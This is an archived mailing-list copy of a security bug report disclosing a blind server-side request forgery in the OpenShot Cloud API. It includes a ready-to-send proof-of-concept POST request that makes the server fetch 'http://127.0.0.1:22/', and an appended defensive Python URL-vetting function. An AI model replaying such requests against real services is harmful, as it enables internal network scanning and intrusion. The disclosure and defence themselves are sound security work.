
openshot.code team mailing list archive

[Bug 2025911] [NEW] Blind Server-Side Request Forgery

 

*** This bug is a security vulnerability ***

Private security bug reported:

Hi Team!


I want to report security vulnerabilities that affect OpenShot Cloud API 


Issue: Blind Server-Side Request Forgery

In the file endpoint, you can download videos or audio files through an HTTP request using the python-requests/2.28.2 library.


The endpoint uses a URL parameter that takes any URL starting with the HTTP | HTTPS scheme.

After doing some research, it turns out that we can make HTTP requests
to the internal network. There is no validation, which can lead to port
scanning and, on some network infrastructures, to RCE.


Steps To Reproduce:


For testing, I used the cloud.openshot.org demo account


1- Log in to http://cloud.openshot.org/ using demo-cloud:demo-password.
2- Now use the Burp Suite proxy to make the following request with your cookie:


```
POST /files/ HTTP/1.1
Host: cloud.openshot.org
Content-Length: 615
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://cloud.openshot.org
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMPHzitQtkRche9nD
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cloud.openshot.org/files/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pt;q=0.8,ar;q=0.7
Cookie: {cookie}
Connection: close

------WebKitFormBoundaryMPHzitQtkRche9nD
Content-Disposition: form-data; name="csrfmiddlewaretoken"

12jzlmMljRVx7Tm9MsYFhy936MehafJj4J8pRGKbTFNtzEssS9dP1ccv8AbnK4AK
------WebKitFormBoundaryMPHzitQtkRche9nD
Content-Disposition: form-data; name="media"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryMPHzitQtkRche9nD
Content-Disposition: form-data; name="project"

http://cloud.openshot.org/projects/872/
------WebKitFormBoundaryMPHzitQtkRche9nD
Content-Disposition: form-data; name="json"

{"url":"http://127.0.0.1:22/"}
------WebKitFormBoundaryMPHzitQtkRche9nD--


```

Response:

SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1

** Affects: openshot
     Importance: Undecided
         Status: New

** Attachment added: "Request->response"
   https://bugs.launchpad.net/bugs/2025911/+attachment/5683896/+files/1-16.png

-- 
You received this bug notification because you are a member of OpenShot
Code, which is subscribed to OpenShot Video Editor.
Matching subscriptions: Private security bugs
https://bugs.launchpad.net/bugs/2025911
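
Added example, not part of the original report and not OpenShot's code: one way a server could vet the `url` value before fetching it, so that the request shown in the report (`http://127.0.0.1:22/`) is refused. The names `vet_fetch_url`, `BlockedURL` and `system_resolver`, and the port allowlist, are assumptions made for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}  # assumption: media is only fetched from standard web ports

class BlockedURL(ValueError):
    """The user-supplied URL must not be fetched by the server."""

def system_resolver(host, port):
    """Every address the host resolves to, IPv4 and IPv6."""
    return [ai[4][0] for ai in socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)]

def vet_fetch_url(url, resolver=system_resolver):
    """Return the vetted IPs for url, or raise BlockedURL."""
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError as exc:
        raise BlockedURL(f"malformed URL: {exc}")
    if parts.scheme not in ALLOWED_SCHEMES:
        raise BlockedURL(f"scheme not allowed: {parts.scheme!r}")
    if not parts.hostname:
        raise BlockedURL("URL has no host")
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        raise BlockedURL(f"port not allowed: {port}")
    try:
        addresses = resolver(parts.hostname, port)
    except (OSError, UnicodeError) as exc:
        raise BlockedURL(f"cannot resolve host: {exc}")
    if not addresses:
        raise BlockedURL("host resolved to no addresses")
    for addr in addresses:
        ip = ipaddress.ip_address(addr.split("%")[0])  # drop any IPv6 zone id
        if ip.version == 6 and ip.ipv4_mapped:         # ::ffff:127.0.0.1 is really IPv4
            ip = ip.ipv4_mapped
        # is_global is False for loopback, RFC 1918, link-local and other reserved ranges
        if not ip.is_global:
            raise BlockedURL(f"{parts.hostname} resolves to non-public address {ip}")
    # Connect to one of these exact IPs: resolving the name again at fetch time
    # would let the DNS answer change between the check and the request.
    return addresses
```

With python-requests, also pass `allow_redirects=False` (or vet each redirect target the same way), since a redirect from a public host can point back at an internal address.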
